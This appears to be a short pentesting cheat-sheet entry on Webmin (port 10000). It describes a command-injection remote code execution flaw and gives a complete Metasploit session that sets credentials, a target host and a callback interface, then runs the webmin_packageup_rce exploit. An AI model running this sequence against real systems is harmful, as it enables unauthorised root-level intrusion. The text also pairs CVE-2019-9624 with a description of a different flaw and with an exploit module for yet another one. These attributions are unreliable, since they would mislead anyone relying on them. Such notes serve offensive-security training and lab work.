10000 - Webmin

Webmin is a web-based system administration interface for Unix-like systems, typically running on port 10000 by default. It allows administrators to manage various aspects of a system—such as users, services, packages, and configuration files—entirely through a browser, without needing to use the terminal or SSH.

RCE

CVE-2019-9624 is a RCE in Webmin versions prior to 1.910. It specifically affects installations where the old password option is enabled for password changes. In vulnerable versions, if a user submits a password change request, Webmin checks the old password—but only if the old password option is enabled in the configuration. Due to improper input handling, attackers could craft a request to inject OS commands through the old password field. These commands would then be executed with the privileges of the Webmin process (often root).

MSF's webmin_packageup_rce module can be used:

msf6 > use exploit/linux/http/webmin_packageup_rce
msf6 exploit(linux/http/webmin_packageup_rce) > set password Password6543
msf6 exploit(linux/http/webmin_packageup_rce) > set username admin
msf6 exploit(linux/http/webmin_packageup_rce) > set rhosts 172.16.1.1
msf6 exploit(linux/http/webmin_packageup_rce) > set rport 10000
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost tun0
msf6 exploit(linux/http/webmin_packageup_rce) > run